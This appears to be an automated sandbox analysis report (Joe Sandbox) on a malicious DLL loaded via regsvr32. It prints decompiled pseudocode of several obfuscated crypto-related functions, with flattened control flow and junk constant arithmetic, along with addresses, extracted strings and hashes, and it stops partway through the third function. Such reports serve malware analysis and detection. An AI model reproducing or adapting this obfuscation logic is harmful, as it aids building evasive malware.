Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04B877A3, Relevance: 9.1, Strings: 7, Instructions: 330
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B877A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t314;
				signed int _t352;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t370;
				signed int* _t401;
				signed int* _t405;
				void* _t407;

				_t402 = _a12;
				_push(_a12);
				_push(_a8);
				_t401 = __ecx;
				_push(_a4);
				_push(__ecx);
				E04B9FE29(_t314);
				_v100 = 0xaefbe1;
				_t405 =  &(( &_v192)[5]);
				_v100 = _v100 + 0x6b82;
				_t370 = 0xc5526f;
				_t362 = 0x2b;
				_v100 = _v100 / _t362;
				_v100 = _v100 ^ 0x00041443;
				_v80 = 0x1d3414;
				_v80 = _v80 + 0xffffdb02;
				_v80 = _v80 ^ 0x0011ba60;
				_v72 = 0x54a5f8;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x000d0ae3;
				_v136 = 0x274773;
				_t26 =  &_v136; // 0x274773
				_t363 = 0x1a;
				_v136 =  *_t26 * 0x4d;
				_v136 = _v136 + 0xffff9993;
				_v136 = _v136 ^ 0x0bd1637a;
				_v88 = 0xd58b4c;
				_v88 = _v88 + 0xffff1506;
				_v88 = _v88 ^ 0x00d01948;
				_v92 = 0x5e6930;
				_t38 =  &_v92; // 0x5e6930
				_v92 =  *_t38;
				_v92 = _v92 ^ 0x00540f59;
				_v116 = 0x40a51;
				_v116 = _v116 | 0x5ce3fa4e;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x1737f89e;
				_v108 = 0x7d5bec;
				_v108 = _v108 | 0x0f0c5889;
				_v108 = _v108 + 0xbcf5;
				_v108 = _v108 ^ 0x0f7d2458;
				_v164 = 0x3d5dd8;
				_v164 = _v164 ^ 0x644c870b;
				_v164 = _v164 >> 0xd;
				_v164 = _v164 * 0x7a;
				_v164 = _v164 ^ 0x017eec74;
				_v180 = 0x53df1b;
				_v180 = _v180 / _t363;
				_v180 = _v180 + 0xffff91ff;
				_v180 = _v180 + 0xffff90b6;
				_v180 = _v180 ^ 0x000d2df2;
				_v76 = 0x6cb33c;
				_v76 = _v76 + 0x7c19;
				_v76 = _v76 ^ 0x0065748e;
				_v160 = 0xaee8e0;
				_t364 = 0x3e;
				_v160 = _v160 / _t364;
				_v160 = _v160 + 0x21f3;
				_v160 = _v160 * 0x52;
				_v160 = _v160 ^ 0x00ffda9d;
				_v84 = 0xdaab99;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x000be4ff;
				_v144 = 0x6cc9e4;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0xa5290d0e;
				_v144 = _v144 ^ 0xa52e4d3d;
				_v120 = 0x3bbeb9;
				_v120 = _v120 ^ 0x393aef05;
				_v120 = _v120 + 0x22c7;
				_v120 = _v120 ^ 0x39070acc;
				_v148 = 0xc13163;
				_v148 = _v148 ^ 0x61e09c7e;
				_v148 = _v148 + 0x1cd6;
				_v148 = _v148 ^ 0x612c2d34;
				_v128 = 0x26c56f;
				_v128 = _v128 >> 2;
				_v128 = _v128 | 0xf6250b40;
				_v128 = _v128 ^ 0xf621b77e;
				_v176 = 0xf92ffc;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0x602a8fe3;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x00d9f38d;
				_v124 = 0x433c84;
				_v124 = _v124 + 0xffff4128;
				_v124 = _v124 ^ 0x1ed7562a;
				_v124 = _v124 ^ 0x1e92a094;
				_v132 = 0x6b8ec6;
				_v132 = _v132 ^ 0x28d18ae0;
				_t365 = 0x6a;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 ^ 0x9158c057;
				_v104 = 0x1fefeb;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 + 0xffff5efe;
				_v104 = _v104 ^ 0xfff4cbde;
				_v168 = 0xc1bc7b;
				_v168 = _v168 >> 3;
				_v168 = _v168 << 7;
				_v168 = _v168 * 0x7d;
				_v168 = _v168 ^ 0xe998ae80;
				_v64 = 0x9d5223;
				_v64 = _v64 | 0x29ada36c;
				_v64 = _v64 ^ 0x29b66376;
				_v184 = 0x42d2c5;
				_v184 = _v184 + 0xffffd8f9;
				_v184 = _v184 | 0x10a03a14;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xe2b073c1;
				_v192 = 0xa502eb;
				_v192 = _v192 ^ 0xb81d0436;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 / _t365;
				_v192 = _v192 ^ 0x000463de;
				_v172 = 0x9c405d;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x75940441;
				_v172 = _v172 + 0xd268;
				_v172 = _v172 ^ 0x759b0547;
				_v156 = 0x9f3fdd;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 9;
				_v156 = _v156 >> 0xd;
				_v156 = _v156 ^ 0x000ada21;
				_v188 = 0xfbaf85;
				_v188 = _v188 | 0xf8737d3a;
				_t366 = 0x3c;
				_v188 = _v188 / _t366;
				_v188 = _v188 ^ 0x0422aead;
				_v112 = 0x7705bd;
				_v112 = _v112 | 0xb4ba0e14;
				_v112 = _v112 * 0x43;
				_v112 = _v112 ^ 0x5ec93514;
				_v96 = 0xe3e42a;
				_v96 = _v96 ^ 0x25c7ee45;
				_v96 = _v96 ^ 0x252c54ca;
				_v68 = 0xae646d;
				_v68 = _v68 + 0xcc0;
				_v68 = _v68 ^ 0x00a4113a;
				_v140 = 0x4c7529;
				_t367 = 0x73;
				_v140 = _v140 / _t367;
				_v140 = _v140 | 0x6ffaa740;
				_v140 = _v140 ^ 0x6ff9ac12;
				_v152 = 0xafca7f;
				_v152 = _v152 + 0xfffffd29;
				_v152 = _v152 + 0xad57;
				_v152 = _v152 + 0x26e2;
				_v152 = _v152 ^ 0x00ba4152;
				goto L1;
				do {
					while(1) {
						L1:
						_t407 = _t370 - 0x696b508;
						if(_t407 > 0) {
							break;
						}
						if(_t407 == 0) {
							_t401[1] = E04B8F369(_t402);
							_t370 = 0x4c1a8a5;
							continue;
						} else {
							if(_t370 == 0xc5526f) {
								_t370 = 0x696b508;
								 *_t401 =  *_t401 & 0x00000000;
								_t401[1] = _v100;
								continue;
							} else {
								if(_t370 == 0x1aa419f) {
									E04B90A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
									_t405 =  &(_t405[4]);
									_t370 = 0x68c33a9;
									continue;
								} else {
									if(_t370 == 0x4c1a8a5) {
										_push(_t370);
										_push(_t370);
										_t352 = E04B8C5D8(_t401[1]);
										_t405 =  &(_t405[3]);
										 *_t401 = _t352;
										__eflags = _t352;
										if(__eflags != 0) {
											_t370 = 0x8344534;
											continue;
										}
									} else {
										if(_t370 == 0x642ef10) {
											E04B9CAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
											_t405 =  &(_t405[3]);
											_t370 = 0x7d262d1;
											continue;
										} else {
											if(_t370 != 0x68c33a9) {
												goto L25;
											} else {
												E04B90A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
												_t405 =  &(_t405[4]);
												_t370 = 0x6a3d126;
												continue;
											}
										}
									}
								}
							}
						}
						goto L26;
					}
					__eflags = _t370 - 0x6a3d126;
					if(__eflags == 0) {
						E04B9CAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
						_t405 =  &(_t405[3]);
						_t370 = 0x2431b15;
						goto L25;
					} else {
						__eflags = _t370 - 0x7d262d1;
						if(_t370 == 0x7d262d1) {
							E04B90A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
							_t405 =  &(_t405[4]);
							_t370 = 0xabb5672;
							goto L1;
						} else {
							__eflags = _t370 - 0x8344534;
							if(_t370 == 0x8344534) {
								E04B822A6(_t401, _v92,  &_v60, _v116);
								_t405 =  &(_t405[2]);
								_t370 = 0x642ef10;
								goto L1;
							} else {
								__eflags = _t370 - 0x94f1f5a;
								if(_t370 == 0x94f1f5a) {
									E04B90A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
									_t405 =  &(_t405[4]);
									_t370 = 0x1aa419f;
									goto L1;
								} else {
									__eflags = _t370 - 0xabb5672;
									if(_t370 != 0xabb5672) {
										goto L25;
									} else {
										E04B90A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
										_t405 =  &(_t405[4]);
										_t370 = 0x94f1f5a;
										goto L1;
									}
								}
							}
						}
					}
					break;
					L25:
					__eflags = _t370 - 0x2431b15;
				} while (__eflags != 0);
				L26:
				__eflags =  *_t401;
				_t313 =  *_t401 != 0;
				__eflags = _t313;
				return 0 | _t313;
			}

0x04b877ac
0x04b877b4
0x04b877b5
0x04b877bc
0x04b877be
0x04b877c6
0x04b877c7
0x04b877cc
0x04b877d7
0x04b877da
0x04b877e8
0x04b877ef
0x04b877f4
0x04b877fa
0x04b87802
0x04b8780d
0x04b87818
0x04b87823
0x04b8782e
0x04b87836
0x04b87841
0x04b87849
0x04b8784e
0x04b87851
0x04b87855
0x04b8785d
0x04b87865
0x04b8786d
0x04b87875
0x04b8787d
0x04b87885
0x04b87889
0x04b8788d
0x04b87895
0x04b8789d
0x04b878a5
0x04b878aa
0x04b878b2
0x04b878ba
0x04b878c2
0x04b878ca
0x04b878d2
0x04b878da
0x04b878e2
0x04b878ec
0x04b878f0
0x04b878f8
0x04b87908
0x04b8790c
0x04b87914
0x04b8791c
0x04b87924
0x04b8792f
0x04b8793a
0x04b87945
0x04b87951
0x04b87954
0x04b87958
0x04b87965
0x04b87969
0x04b87971
0x04b87979
0x04b8797e
0x04b87988
0x04b87990
0x04b87995
0x04b8799d
0x04b879a5
0x04b879ad
0x04b879b5
0x04b879bd
0x04b879c5
0x04b879cd
0x04b879d5
0x04b879dd
0x04b879e5
0x04b879ed
0x04b879f2
0x04b879fa
0x04b87a02
0x04b87a0a
0x04b87a0f
0x04b87a17
0x04b87a1c
0x04b87a24
0x04b87a2c
0x04b87a34
0x04b87a3c
0x04b87a44
0x04b87a4c
0x04b87a5b
0x04b87a5e
0x04b87a62
0x04b87a6a
0x04b87a72
0x04b87a77
0x04b87a7f
0x04b87a87
0x04b87a8f
0x04b87a94
0x04b87a9e
0x04b87aa2
0x04b87aaa
0x04b87ab5
0x04b87ac0
0x04b87acb
0x04b87ad3
0x04b87adb
0x04b87ae3
0x04b87ae8
0x04b87af0
0x04b87af8
0x04b87b00
0x04b87b0d
0x04b87b11
0x04b87b19
0x04b87b21
0x04b87b26
0x04b87b2e
0x04b87b36
0x04b87b3e
0x04b87b46
0x04b87b4b
0x04b87b50
0x04b87b55
0x04b87b5d
0x04b87b65
0x04b87b71
0x04b87b74
0x04b87b78
0x04b87b80
0x04b87b88
0x04b87b95
0x04b87b9b
0x04b87ba8
0x04b87bb0
0x04b87bb8
0x04b87bc0
0x04b87bcb
0x04b87bd6
0x04b87be1
0x04b87bef
0x04b87bf7
0x04b87bfb
0x04b87c03
0x04b87c0b
0x04b87c13
0x04b87c1b
0x04b87c23
0x04b87c2b
0x04b87c2b
0x04b87c33
0x04b87c33
0x04b87c33
0x04b87c33
0x04b87c35
0x00000000
0x00000000
0x04b87c3b
0x04b87d45
0x04b87d48
0x00000000
0x04b87c41
0x04b87c47
0x04b87d31
0x04b87d33
0x04b87d36
0x00000000
0x04b87c4d
0x04b87c53
0x04b87d1b
0x04b87d20
0x04b87d23
0x00000000
0x04b87c59
0x04b87c5f
0x04b87cdf
0x04b87ce0
0x04b87ce4
0x04b87ce9
0x04b87cec
0x04b87cee
0x04b87cf0
0x04b87cf6
0x00000000
0x04b87cf6
0x04b87c61
0x04b87c67
0x04b87cb7
0x04b87cbc
0x04b87cbf
0x00000000
0x04b87c69
0x04b87c6f
0x00000000
0x04b87c75
0x04b87c90
0x04b87c95
0x04b87c98
0x00000000
0x04b87c98
0x04b87c6f
0x04b87c67
0x04b87c5f
0x04b87c53
0x04b87c47
0x00000000
0x04b87c3b
0x04b87d52
0x04b87d58
0x04b87e4e
0x04b87e53
0x04b87e56
0x00000000
0x04b87d5e
0x04b87d5e
0x04b87d64
0x04b87e21
0x04b87e26
0x04b87e29
0x00000000
0x04b87d6a
0x04b87d6a
0x04b87d6c
0x04b87dee
0x04b87df3
0x04b87df6
0x00000000
0x04b87d6e
0x04b87d6e
0x04b87d74
0x04b87dca
0x04b87dcf
0x04b87dd2
0x00000000
0x04b87d76
0x04b87d76
0x04b87d7c
0x00000000
0x04b87d82
0x04b87d9d
0x04b87da2
0x04b87da5
0x00000000
0x04b87da5
0x04b87d7c
0x04b87d74
0x04b87d6c
0x04b87d64
0x00000000
0x04b87e5b
0x04b87e5b
0x04b87e5b
0x04b87e67
0x04b87e69
0x04b87e6e
0x04b87e6e
0x04b87e78

Strings

4-,a, xrefs: 04B879DD
)uL, xrefs: 04B87BE1
0i^, xrefs: 04B87885
*, xrefs: 04B87BA8
&, xrefs: 04B87C23
sG', xrefs: 04B87849
[}, xrefs: 04B878B2

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )uL$*$0i^$4-,a$sG'$&$[}
API String ID: 0-4036371101
Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction ID: b69f56bbb44949e27c747d778a1122f5956ab77826223a21cd2bd23dfeebc263
Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction Fuzzy Hash: 80F133B1508384DFD368DF21C889A6BFBF1FB94348F50891DE69A86220D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B86B7A, Relevance: 9.0, Strings: 7, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B86B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t242;
				void* _t265;
				void* _t269;
				signed int _t271;
				signed int _t272;
				char* _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr* _t285;
				void* _t287;
				signed int _t292;
				intOrPtr _t298;
				intOrPtr _t324;
				intOrPtr* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				void* _t336;
				void* _t337;

				_t285 = _a8;
				_push(_t285);
				_push(_a4);
				_t326 = __edx;
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_t242);
				_v100 = 0x757930;
				_t337 = _t336 + 0x10;
				_v96 = 0xd80ad;
				_t324 = 0;
				_v92 = 0x3caa7;
				_v88 = 0;
				_t287 = 0x43d278a;
				_v140 = 0xa476d3;
				_v140 = _v140 + 0x8b71;
				_v140 = _v140 ^ 0x00a50244;
				_v192 = 0x86f1c9;
				_v192 = _v192 | 0xd7b81b76;
				_t327 = 0x1d;
				_v192 = _v192 / _t327;
				_v192 = _v192 + 0xffff13d4;
				_v192 = _v192 ^ 0x076f980a;
				_v188 = 0x843aad;
				_v188 = _v188 << 0x10;
				_v188 = _v188 | 0xc1fad14f;
				_t328 = 0x74;
				_v188 = _v188 * 0x5b;
				_v188 = _v188 ^ 0x93eb17e1;
				_v168 = 0x8317bb;
				_v168 = _v168 ^ 0x1362ec48;
				_v168 = _v168 ^ 0x4008a55c;
				_v168 = _v168 ^ 0x53e7b525;
				_v144 = 0x20a76b;
				_v144 = _v144 / _t328;
				_v144 = _v144 ^ 0x000a47fb;
				_v196 = 0xe0aa92;
				_v196 = _v196 ^ 0x05a4f46c;
				_t329 = 0x24;
				_v196 = _v196 / _t329;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0x257ea781;
				_v200 = 0xe588c5;
				_t330 = 0x29;
				_v200 = _v200 / _t330;
				_v200 = _v200 >> 6;
				_v200 = _v200 >> 0x10;
				_v200 = _v200 ^ 0x000d5940;
				_v164 = 0x4155a9;
				_v164 = _v164 >> 5;
				_v164 = _v164 | 0x5ba52662;
				_v164 = _v164 ^ 0x5ba55520;
				_v160 = 0x4466c5;
				_v160 = _v160 >> 9;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x000d6457;
				_v148 = 0x35624e;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 ^ 0x000abf08;
				_v172 = 0x5696ab;
				_v172 = _v172 + 0xe488;
				_v172 = _v172 + 0x10cb;
				_v172 = _v172 ^ 0x0055d7ec;
				_v128 = 0xad635c;
				_v128 = _v128 ^ 0xb55b0f96;
				_v128 = _v128 ^ 0xb5f22a9b;
				_v208 = 0x275835;
				_t108 =  &_v208; // 0x275835
				_t331 = 0x37;
				_v208 =  *_t108 / _t331;
				_v208 = _v208 ^ 0xb04b577b;
				_t332 = 0x21;
				_v208 = _v208 / _t332;
				_v208 = _v208 ^ 0x055d5c1c;
				_v132 = 0x1cc441;
				_t333 = 0x6a;
				_v132 = _v132 / _t333;
				_v132 = _v132 ^ 0x000e83d7;
				_v204 = 0x125b67;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0xe127959b;
				_v204 = _v204 << 0x10;
				_v204 = _v204 ^ 0x07419ea5;
				_v180 = 0x68abbe;
				_v180 = _v180 | 0x57b8f8fa;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0x7df5736a;
				_v156 = 0x6240f4;
				_v156 = _v156 + 0xffffe0b8;
				_t334 = 0x69;
				_v156 = _v156 * 0x13;
				_v156 = _v156 ^ 0x0741ad16;
				_v124 = 0xa95440;
				_v124 = _v124 / _t334;
				_v124 = _v124 ^ 0x00021dd5;
				_v176 = 0x6e61ec;
				_v176 = _v176 + 0x7ec3;
				_v176 = _v176 | 0x8e41022f;
				_v176 = _v176 ^ 0x8e60c50b;
				_v120 = 0x9285fa;
				_v120 = _v120 ^ 0x677ff2d5;
				_v120 = _v120 ^ 0x67e9a1bb;
				_v152 = 0x5286f5;
				_v152 = _v152 + 0xffff3b7a;
				_v152 = _v152 ^ 0x016928ba;
				_v152 = _v152 ^ 0x013cf174;
				_v184 = 0xd65a61;
				_v184 = _v184 * 0x45;
				_v184 = _v184 + 0xffff6116;
				_v184 = _v184 ^ 0x39cc51e9;
				_v136 = 0xa284b3;
				_v136 = _v136 + 0x4b38;
				_v136 = _v136 ^ 0x00a4fd93;
				while(_t287 != 0x1b81945) {
					if(_t287 == 0x314f545) {
						_t265 = E04BA46BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
						_t337 = _t337 + 0x10;
						if(_t265 == 0) {
							L25:
							return _t324;
						}
						_t287 = 0x958f9d6;
						continue;
					}
					if(_t287 == 0x43d278a) {
						_t287 = 0xee3ea02;
						continue;
					}
					if(_t287 == 0x55d8418) {
						_t292 = _v172;
						_t269 = E04BA07AA(_t292, _v128,  &_v84, _v208,  &_v76);
						_t337 = _t337 + 0xc;
						if(_t269 != 0) {
							_push(_t292);
							_push(_t292);
							_t282 = E04B8C5D8(_v80);
							_t337 = _t337 + 0xc;
							 *_t326 = _t282;
							if(_t282 != 0) {
								E04B9C9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
								_t337 = _t337 + 0x10;
								 *((intOrPtr*)(_t326 + 4)) = _v80;
								_t324 = 1;
							}
						}
						_t287 = 0x1b81945;
						continue;
					}
					if(_t287 == 0x958f9d6) {
						_t271 = E04B8C473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
						_t337 = _t337 + 0x10;
						asm("sbb ecx, ecx");
						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
						continue;
					}
					if(_t287 != 0xee3ea02) {
						L24:
						if(_t287 != 0x1eefa0b) {
							continue;
						}
						goto L25;
					}
					_t272 =  *((intOrPtr*)(_t285 + 4));
					_t298 =  *_t285;
					_v112 = _t272;
					_v116 = _t298;
					_t274 = _t272 - 1 + _t298;
					while(_t274 > _t298) {
						if( *_t274 == 0) {
							break;
						}
						_t274 = _t274 - 1;
					}
					_t275 = _t274 - _t298;
					_v112 = _t275;
					if(_t275 == 0) {
						L14:
						_t287 = 0x314f545;
						continue;
					}
					while(_v112 % _v192 != _v140) {
						_t207 =  &_v112;
						 *_t207 = _v112 - 1;
						if( *_t207 != 0) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
				E04BA2B09(_v152, _v108, _v184, _v136);
				_t287 = 0x1eefa0b;
				goto L24;
			}

0x04b86b81
0x04b86b8b
0x04b86b8c
0x04b86b93
0x04b86b95
0x04b86b96
0x04b86b97
0x04b86b9c
0x04b86ba7
0x04b86baa
0x04b86bb5
0x04b86bb7
0x04b86bc4
0x04b86bcb
0x04b86bd0
0x04b86bd8
0x04b86be0
0x04b86be8
0x04b86bf0
0x04b86bfe
0x04b86c03
0x04b86c09
0x04b86c11
0x04b86c19
0x04b86c21
0x04b86c26
0x04b86c33
0x04b86c36
0x04b86c3a
0x04b86c42
0x04b86c4a
0x04b86c52
0x04b86c5a
0x04b86c62
0x04b86c72
0x04b86c76
0x04b86c7e
0x04b86c86
0x04b86c92
0x04b86c97
0x04b86c9d
0x04b86ca2
0x04b86caa
0x04b86cb6
0x04b86cb9
0x04b86cbd
0x04b86cc2
0x04b86cc7
0x04b86ccf
0x04b86cd7
0x04b86cdc
0x04b86ce4
0x04b86cec
0x04b86cf4
0x04b86cf9
0x04b86cfe
0x04b86d06
0x04b86d0e
0x04b86d13
0x04b86d1b
0x04b86d23
0x04b86d2d
0x04b86d35
0x04b86d3d
0x04b86d45
0x04b86d4d
0x04b86d55
0x04b86d5d
0x04b86d63
0x04b86d68
0x04b86d6e
0x04b86d7a
0x04b86d7f
0x04b86d85
0x04b86d8d
0x04b86d99
0x04b86d9e
0x04b86da4
0x04b86dac
0x04b86db4
0x04b86db9
0x04b86dc1
0x04b86dc6
0x04b86dce
0x04b86dd6
0x04b86dde
0x04b86de3
0x04b86deb
0x04b86df3
0x04b86e00
0x04b86e01
0x04b86e05
0x04b86e0d
0x04b86e20
0x04b86e24
0x04b86e2c
0x04b86e34
0x04b86e3c
0x04b86e44
0x04b86e4c
0x04b86e54
0x04b86e5c
0x04b86e64
0x04b86e6c
0x04b86e74
0x04b86e7c
0x04b86e84
0x04b86e91
0x04b86e95
0x04b86e9d
0x04b86ea5
0x04b86ead
0x04b86eb5
0x04b86ebd
0x04b86ecb
0x04b8702a
0x04b8702f
0x04b87034
0x04b8706b
0x04b87077
0x04b87077
0x04b87036
0x00000000
0x04b87036
0x04b86ed7
0x04b87004
0x00000000
0x04b87004
0x04b86ee3
0x04b86f94
0x04b86f99
0x04b86f9e
0x04b86fa3
0x04b86fb5
0x04b86fb6
0x04b86fbe
0x04b86fc3
0x04b86fc6
0x04b86fca
0x04b86fe8
0x04b86ff6
0x04b86ff9
0x04b86ffc
0x04b86ffc
0x04b86fca
0x04b86ffd
0x00000000
0x04b86ffd
0x04b86eef
0x04b86f62
0x04b86f67
0x04b86f6e
0x04b86f76
0x00000000
0x04b86f76
0x04b86ef7
0x04b8705f
0x04b87065
0x00000000
0x00000000
0x00000000
0x04b87065
0x04b86efd
0x04b86f00
0x04b86f02
0x04b86f07
0x04b86f0b
0x04b86f15
0x04b86f12
0x00000000
0x00000000
0x04b86f14
0x04b86f14
0x04b86f19
0x04b86f1b
0x04b86f1f
0x04b86f39
0x04b86f39
0x00000000
0x04b86f39
0x04b86f21
0x04b86f33
0x04b86f33
0x04b86f37
0x00000000
0x00000000
0x00000000
0x04b86f37
0x00000000
0x04b86f21
0x04b87053
0x04b8705a
0x00000000

Strings

8K, xrefs: 04B86EAD
Nb5, xrefs: 04B86D06
Wd, xrefs: 04B86CFE
5X', xrefs: 04B86D5D
@Y, xrefs: 04B86CC7
an, xrefs: 04B86E2C
0yu, xrefs: 04B86B9C

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
API String ID: 0-1112794312
Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction ID: c01901fb77a401475bc1205310f1c376f70fe8059a1ea2e39fc623c0096b5e71
Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction Fuzzy Hash: D8C142715083808FD328DF66C949A1BBBF1FBC5748F10891DF69686261DBB2D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B9DC71, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B9DC71() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t246;
				intOrPtr* _t248;
				signed int _t254;
				intOrPtr _t255;
				intOrPtr* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t290;
				signed int* _t294;

				_t294 =  &_v108;
				_v28 = 0x1aa6a3;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x8001aa6b;
				_v68 = 0xf966b1;
				_v68 = _v68 | 0xf5f58fdd;
				_v4 = 0;
				_t290 = 0xa5173af;
				_t257 = 0x26;
				_v68 = _v68 / _t257;
				_v68 = _v68 ^ 0x0679357b;
				_v108 = 0xb8ff00;
				_v108 = _v108 | 0x28c12dd3;
				_t258 = 0x42;
				_v108 = _v108 / _t258;
				_v108 = _v108 + 0x2548;
				_v108 = _v108 ^ 0x0093f641;
				_v80 = 0x4a20cb;
				_v80 = _v80 | 0x50657e73;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x00ac2c39;
				_v84 = 0x6237d1;
				_v84 = _v84 ^ 0x87c50ead;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x7a73b039;
				_v88 = 0x617a8;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x00004866;
				_v96 = 0x113f2;
				_v96 = _v96 + 0x334b;
				_v96 = _v96 << 0xb;
